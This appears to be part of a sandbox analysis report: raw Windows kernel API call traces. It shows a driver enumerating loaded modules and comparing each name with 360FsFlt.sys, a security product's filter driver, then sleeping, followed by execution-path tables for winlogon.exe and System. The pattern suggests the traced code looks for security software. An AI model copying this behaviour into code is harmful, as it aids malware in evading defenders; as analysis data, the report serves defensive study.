| _wcsicmp | _String1 = WindowsTrustedRT.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43bb50, ret_val_out = 1 |
| _wcsicmp | _String1 = WindowsTrustedRT.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43bb50, ret_val_out = 1 |
| _wcsicmp | _String1 = WindowsTrustedRT.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b9c0, ret_val_out = 1 |
| _wcsicmp | _String1 = WindowsTrustedRTProxy.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b9c0, ret_val_out = 1 |
| _wcsicmp | _String1 = WindowsTrustedRTProxy.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b9c0, ret_val_out = 1 |
| _wcsicmp | _String1 = WindowsTrustedRTProxy.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b9c0, ret_val_out = 1 |
| _wcsicmp | _String1 = WindowsTrustedRTProxy.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b9c0, ret_val_out = 1 |
| _wcsicmp | _String1 = WindowsTrustedRTProxy.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b860, ret_val_out = 1 |
| _wcsicmp | _String1 = pcw.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b860, ret_val_out = 1 |
| _wcsicmp | _String1 = pcw.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b860, ret_val_out = 1 |
| _wcsicmp | _String1 = pcw.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b860, ret_val_out = 1 |
| _wcsicmp | _String1 = pcw.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b860, ret_val_out = 1 |
| _wcsicmp | _String1 = pcw.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b6f0, ret_val_out = 1 |
| _wcsicmp | _String1 = msisadrv.sys, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b6f0, ret_val_out = 1 |
| _wcsicmp | _String1 = msisadrv.sys, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b6f0, ret_val_out = 1 |
| _wcsicmp | _String1 = msisadrv.sys, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b6f0, ret_val_out = 1 |
| _wcsicmp | _String1 = msisadrv.sys, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b6f0, ret_val_out = 1 |
| _wcsicmp | _String1 = msisadrv.sys, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b588, ret_val_out = 1 |
| _wcsicmp | _String1 = pci.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b588, ret_val_out = 1 |
| _wcsicmp | _String1 = pci.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b588, ret_val_out = 1 |
| _wcsicmp | _String1 = pci.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b588, ret_val_out = 1 |
| _wcsicmp | _String1 = pci.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b588, ret_val_out = 1 |
| _wcsicmp | _String1 = pci.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b410, ret_val_out = 1 |
| _wcsicmp | _String1 = vdrvroot.sys, _String2 = 360FsFlt.sys, ret_val_out = 67 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b410, ret_val_out = 1 |
| _wcsicmp | _String1 = vdrvroot.sys, _String2 = 360FsFlt.sys, ret_val_out = 67 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b410, ret_val_out = 1 |
| _wcsicmp | _String1 = vdrvroot.sys, _String2 = 360FsFlt.sys, ret_val_out = 67 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b410, ret_val_out = 1 |
| _wcsicmp | _String1 = vdrvroot.sys, _String2 = 360FsFlt.sys, ret_val_out = 67 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b410, ret_val_out = 1 |
| _wcsicmp | _String1 = vdrvroot.sys, _String2 = 360FsFlt.sys, ret_val_out = 67 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b2b0, ret_val_out = 1 |
| _wcsicmp | _String1 = pdc.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b2b0, ret_val_out = 1 |
| _wcsicmp | _String1 = pdc.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b2b0, ret_val_out = 1 |
| _wcsicmp | _String1 = pdc.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b2b0, ret_val_out = 1 |
| _wcsicmp | _String1 = pdc.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a43b2b0, ret_val_out = 1 |
| _wcsicmp | _String1 = pdc.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443120, ret_val_out = 1 |
| _wcsicmp | _String1 = CEA.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443120, ret_val_out = 1 |
| _wcsicmp | _String1 = CEA.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443120, ret_val_out = 1 |
| _wcsicmp | _String1 = CEA.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443120, ret_val_out = 1 |
| _wcsicmp | _String1 = CEA.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443120, ret_val_out = 1 |
| _wcsicmp | _String1 = CEA.sys, _String2 = 360FsFlt.sys, ret_val_out = 48 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443fb0, ret_val_out = 1 |
| _wcsicmp | _String1 = partmgr.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443fb0, ret_val_out = 1 |
| _wcsicmp | _String1 = partmgr.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443fb0, ret_val_out = 1 |
| _wcsicmp | _String1 = partmgr.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443fb0, ret_val_out = 1 |
| _wcsicmp | _String1 = partmgr.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443fb0, ret_val_out = 1 |
| _wcsicmp | _String1 = partmgr.sys, _String2 = 360FsFlt.sys, ret_val_out = 61 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443e40, ret_val_out = 1 |
| _wcsicmp | _String1 = spaceport.sys, _String2 = 360FsFlt.sys, ret_val_out = 64 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443e40, ret_val_out = 1 |
| _wcsicmp | _String1 = spaceport.sys, _String2 = 360FsFlt.sys, ret_val_out = 64 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443e40, ret_val_out = 1 |
| _wcsicmp | _String1 = spaceport.sys, _String2 = 360FsFlt.sys, ret_val_out = 64 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443e40, ret_val_out = 1 |
| _wcsicmp | _String1 = spaceport.sys, _String2 = 360FsFlt.sys, ret_val_out = 64 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443e40, ret_val_out = 1 |
| _wcsicmp | _String1 = spaceport.sys, _String2 = 360FsFlt.sys, ret_val_out = 64 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443cc0, ret_val_out = 1 |
| _wcsicmp | _String1 = volmgr.sys, _String2 = 360FsFlt.sys, ret_val_out = 67 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443cc0, ret_val_out = 1 |
| _wcsicmp | _String1 = volmgr.sys, _String2 = 360FsFlt.sys, ret_val_out = 67 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443cc0, ret_val_out = 1 |
| _wcsicmp | _String1 = volmgr.sys, _String2 = 360FsFlt.sys, ret_val_out = 67 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443cc0, ret_val_out = 1 |
| _wcsicmp | _String1 = volmgr.sys, _String2 = 360FsFlt.sys, ret_val_out = 67 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443cc0, ret_val_out = 1 |
| _wcsicmp | _String1 = volmgr.sys, _String2 = 360FsFlt.sys, ret_val_out = 67 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443b58, ret_val_out = 1 |
| _wcsicmp | _String1 = volmgrx.sys, _String2 = 360FsFlt.sys, ret_val_out = 67 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443b58, ret_val_out = 1 |
| _wcsicmp | _String1 = volmgrx.sys, _String2 = 360FsFlt.sys, ret_val_out = 67 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443b58, ret_val_out = 1 |
| _wcsicmp | _String1 = volmgrx.sys, _String2 = 360FsFlt.sys, ret_val_out = 67 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443b58, ret_val_out = 1 |
| _wcsicmp | _String1 = volmgrx.sys, _String2 = 360FsFlt.sys, ret_val_out = 67 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443b58, ret_val_out = 1 |
| _wcsicmp | _String1 = volmgrx.sys, _String2 = 360FsFlt.sys, ret_val_out = 67 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a4439e0, ret_val_out = 1 |
| _wcsicmp | _String1 = mountmgr.sys, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a4439e0, ret_val_out = 1 |
| _wcsicmp | _String1 = mountmgr.sys, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a4439e0, ret_val_out = 1 |
| _wcsicmp | _String1 = mountmgr.sys, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a4439e0, ret_val_out = 1 |
| _wcsicmp | _String1 = mountmgr.sys, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a4439e0, ret_val_out = 1 |
| _wcsicmp | _String1 = mountmgr.sys, _String2 = 360FsFlt.sys, ret_val_out = 58 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443880, ret_val_out = 1 |
| _wcsicmp | _String1 = storahci.sys, _String2 = 360FsFlt.sys, ret_val_out = 64 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443880, ret_val_out = 1 |
| _wcsicmp | _String1 = storahci.sys, _String2 = 360FsFlt.sys, ret_val_out = 64 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443880, ret_val_out = 1 |
| _wcsicmp | _String1 = storahci.sys, _String2 = 360FsFlt.sys, ret_val_out = 64 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443880, ret_val_out = 1 |
| _wcsicmp | _String1 = storahci.sys, _String2 = 360FsFlt.sys, ret_val_out = 64 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443880, ret_val_out = 1 |
| _wcsicmp | _String1 = storahci.sys, _String2 = 360FsFlt.sys, ret_val_out = 64 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443708, ret_val_out = 1 |
| _wcsicmp | _String1 = storport.sys, _String2 = 360FsFlt.sys, ret_val_out = 64 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443708, ret_val_out = 1 |
| _wcsicmp | _String1 = storport.sys, _String2 = 360FsFlt.sys, ret_val_out = 64 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443708, ret_val_out = 1 |
| _wcsicmp | _String1 = storport.sys, _String2 = 360FsFlt.sys, ret_val_out = 64 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443708, ret_val_out = 1 |
| _wcsicmp | _String1 = storport.sys, _String2 = 360FsFlt.sys, ret_val_out = 64 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443708, ret_val_out = 1 |
| _wcsicmp | _String1 = storport.sys, _String2 = 360FsFlt.sys, ret_val_out = 64 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443590, ret_val_out = 1 |
| _wcsicmp | _String1 = EhStorClass.sys, _String2 = 360FsFlt.sys, ret_val_out = 50 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443590, ret_val_out = 1 |
| _wcsicmp | _String1 = EhStorClass.sys, _String2 = 360FsFlt.sys, ret_val_out = 50 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443590, ret_val_out = 1 |
| _wcsicmp | _String1 = EhStorClass.sys, _String2 = 360FsFlt.sys, ret_val_out = 50 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443590, ret_val_out = 1 |
| _wcsicmp | _String1 = EhStorClass.sys, _String2 = 360FsFlt.sys, ret_val_out = 50 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443590, ret_val_out = 1 |
| _wcsicmp | _String1 = EhStorClass.sys, _String2 = 360FsFlt.sys, ret_val_out = 50 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443420, ret_val_out = 1 |
| _wcsicmp | _String1 = fileinfo.sys, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443420, ret_val_out = 1 |
| _wcsicmp | _String1 = fileinfo.sys, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443420, ret_val_out = 1 |
| _wcsicmp | _String1 = fileinfo.sys, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443420, ret_val_out = 1 |
| _wcsicmp | _String1 = fileinfo.sys, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a443420, ret_val_out = 1 |
| _wcsicmp | _String1 = fileinfo.sys, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a4432c0, ret_val_out = 1 |
| _wcsicmp | _String1 = Wof.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a4432c0, ret_val_out = 1 |
| _wcsicmp | _String1 = Wof.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a4432c0, ret_val_out = 1 |
| _wcsicmp | _String1 = Wof.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a4432c0, ret_val_out = 1 |
| _wcsicmp | _String1 = Wof.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a4432c0, ret_val_out = 1 |
| _wcsicmp | _String1 = Wof.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442160, ret_val_out = 1 |
| _wcsicmp | _String1 = NTFS.sys, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442160, ret_val_out = 1 |
| _wcsicmp | _String1 = NTFS.sys, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442160, ret_val_out = 1 |
| _wcsicmp | _String1 = NTFS.sys, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442160, ret_val_out = 1 |
| _wcsicmp | _String1 = NTFS.sys, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442160, ret_val_out = 1 |
| _wcsicmp | _String1 = NTFS.sys, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442fb0, ret_val_out = 1 |
| _wcsicmp | _String1 = Fs_Rec.sys, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442fb0, ret_val_out = 1 |
| _wcsicmp | _String1 = Fs_Rec.sys, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442fb0, ret_val_out = 1 |
| _wcsicmp | _String1 = Fs_Rec.sys, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442fb0, ret_val_out = 1 |
| _wcsicmp | _String1 = Fs_Rec.sys, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442fb0, ret_val_out = 1 |
| _wcsicmp | _String1 = Fs_Rec.sys, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442e40, ret_val_out = 1 |
| _wcsicmp | _String1 = ndis.sys, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442e40, ret_val_out = 1 |
| _wcsicmp | _String1 = ndis.sys, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442e40, ret_val_out = 1 |
| _wcsicmp | _String1 = ndis.sys, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442e40, ret_val_out = 1 |
| _wcsicmp | _String1 = ndis.sys, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442e40, ret_val_out = 1 |
| _wcsicmp | _String1 = ndis.sys, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442ca8, ret_val_out = 1 |
| _wcsicmp | _String1 = NETIO.SYS, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442ca8, ret_val_out = 1 |
| _wcsicmp | _String1 = NETIO.SYS, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442ca8, ret_val_out = 1 |
| _wcsicmp | _String1 = NETIO.SYS, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442ca8, ret_val_out = 1 |
| _wcsicmp | _String1 = NETIO.SYS, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442ca8, ret_val_out = 1 |
| _wcsicmp | _String1 = NETIO.SYS, _String2 = 360FsFlt.sys, ret_val_out = 59 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442b30, ret_val_out = 1 |
| _wcsicmp | _String1 = ksecpkg.sys, _String2 = 360FsFlt.sys, ret_val_out = 56 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442b30, ret_val_out = 1 |
| _wcsicmp | _String1 = ksecpkg.sys, _String2 = 360FsFlt.sys, ret_val_out = 56 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442b30, ret_val_out = 1 |
| _wcsicmp | _String1 = ksecpkg.sys, _String2 = 360FsFlt.sys, ret_val_out = 56 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442b30, ret_val_out = 1 |
| _wcsicmp | _String1 = ksecpkg.sys, _String2 = 360FsFlt.sys, ret_val_out = 56 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442b30, ret_val_out = 1 |
| _wcsicmp | _String1 = ksecpkg.sys, _String2 = 360FsFlt.sys, ret_val_out = 56 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a4429b8, ret_val_out = 1 |
| _wcsicmp | _String1 = tcpip.sys, _String2 = 360FsFlt.sys, ret_val_out = 65 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a4429b8, ret_val_out = 1 |
| _wcsicmp | _String1 = tcpip.sys, _String2 = 360FsFlt.sys, ret_val_out = 65 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a4429b8, ret_val_out = 1 |
| _wcsicmp | _String1 = tcpip.sys, _String2 = 360FsFlt.sys, ret_val_out = 65 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a4429b8, ret_val_out = 1 |
| _wcsicmp | _String1 = tcpip.sys, _String2 = 360FsFlt.sys, ret_val_out = 65 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a4429b8, ret_val_out = 1 |
| _wcsicmp | _String1 = tcpip.sys, _String2 = 360FsFlt.sys, ret_val_out = 65 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442808, ret_val_out = 1 |
| _wcsicmp | _String1 = fwpkclnt.sys, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442808, ret_val_out = 1 |
| _wcsicmp | _String1 = fwpkclnt.sys, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442808, ret_val_out = 1 |
| _wcsicmp | _String1 = fwpkclnt.sys, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442808, ret_val_out = 1 |
| _wcsicmp | _String1 = fwpkclnt.sys, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442808, ret_val_out = 1 |
| _wcsicmp | _String1 = fwpkclnt.sys, _String2 = 360FsFlt.sys, ret_val_out = 51 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442690, ret_val_out = 1 |
| _wcsicmp | _String1 = wfplwfs.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442690, ret_val_out = 1 |
| _wcsicmp | _String1 = wfplwfs.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442690, ret_val_out = 1 |
| _wcsicmp | _String1 = wfplwfs.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| MmIsAddressValid | VirtualAddress_ptr = 0xffffe0003a442690, ret_val_out = 1 |
| _wcsicmp | _String1 = wfplwfs.sys, _String2 = 360FsFlt.sys, ret_val_out = 68 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002e35e4d8, Interval = -50000000, ret_val_out = 0x0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002e35e4d8, Interval = -50000000, ret_val_out = 0x0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002e35e4d8, Interval = -50000000, ret_val_out = 0x0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002e35e4d8, Interval = -50000000, ret_val_out = 0x0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002e35e4d8, Interval = -50000000, ret_val_out = 0x0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002e35e4d8, Interval = -50000000, ret_val_out = 0x0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002e35e4d8, Interval = -50000000, ret_val_out = 0x0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002e35e4d8, Interval = -50000000, ret_val_out = 0x0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002e35e4d8, Interval = -50000000, ret_val_out = 0x0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002e35e4d8, Interval = -50000000, ret_val_out = 0x0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002e35e4d8, Interval = -50000000, ret_val_out = 0x0 |
| KeDelayExecutionThread | WaitMode_unk = 0x0, Alertable = 0, Interval_ptr = 0xffffd0002e35e4d8, Interval = -50000000, ret_val_out = 0x0 |
Code Block #26 (EP #38)
»
| Information | Value |
|---|---|
| Trigger | KiDeliverApc+0x131 |
| Start Address | 0xfffff800fc2bc730 |
Execution Path #38 (length: 1, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 1 |
Processes
»
| Process | Count |
|---|---|
| Process 25 (winlogon.exe, PID: 508) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| KeTestAlertThread | ret_val_out = 0x0 |
Kernel Graph 2
Code Block #2 (EP #1)
»
| Information | Value |
|---|---|
| Trigger | KiInterruptDispatchNoLockNoEtw+0x1dc |
| Start Address | 0xffffe0003af78756 |
Execution Path #1 (length: 823, count: 1, processes: 1)
»
| Information | Value |
|---|---|
| Sequence Length | 823 |
Processes
»
| Process | Count |
|---|---|
| Process 2 (System, PID: 4) | 1 |
Sequence
»
| Symbol | Parameters |
|---|---|
| ExAcquireSpinLockSharedAtDpcLevel | SpinLock_unk = 0xfffff80041a161c0, SpinLock_unk_out = 0xfffff80041a161c0 |
| ExReleaseSpinLockSharedFromDpcLevel | SpinLock_unk = 0xfffff80041a161c0, SpinLock_unk_out = 0xfffff80041a161c0 |
| MmGetNextSession | ret_val_out = 0xffffe0003bb08100 |
| MmAttachSession | ret_val_out = 0x0 |
| PsGetProcessSessionIdEx | ret_val_out = 0x0 |
| RtlLookupFunctionTable | ret_val_out = 0xfffff961ffce9000 |
| ExAllocatePoolWithTag | PoolType_unk = 0x200, NumberOfBytes_ptr = 0x80, Tag = 0x70764946, ret_val_ptr_out = 0xffffe0003c5f6280 |
| RtlImageNtHeader | BaseAddress_ptr = 0xfffff961ffce0000, ret_val_unk_out = 0xfffff961ffce00e0 |
| MmIsSessionAddress | ret_val_out = 0x0 |
| MmIsSessionAddress | ret_val_out = 0x1 |
| RtlLookupFunctionTable | ret_val_out = 0xfffff962004a1000 |
| MmIsSessionAddress | ret_val_out = 0x1 |
| RtlLookupFunctionTable | ret_val_out = 0xfffff961fff0d000 |
| RtlImageNtHeader | BaseAddress_ptr = 0xfffff96200170000, ret_val_unk_out = 0xfffff962001700f0 |
| RtlImageNtHeader | BaseAddress_ptr = 0xfffff961ffe00000, ret_val_unk_out = 0xfffff961ffe000f0 |
| ExFreePool | P_ptr = 0xffffe0003c5f6280 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x45baa, Tag = 0x63536c41, ret_val_ptr_out = 0xffffe0003c8ce000 |
| ExAllocatePoolWithTag | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x45937, Tag = 0x63536c41, ret_val_ptr_out = 0xffffe0003c959000 |
| ExFreePool | P_ptr = 0xffffe0003c8ce000 |
| RtlLookupFunctionEntry | ControlPc = 0xfffff961ffce19c0, HistoryTable_unk = 0x0, ImageBase_ptr_out = 0xffffd0002d573d08, HistoryTable_unk_out = 0x0, ret_val_unk_out = 0x0 |
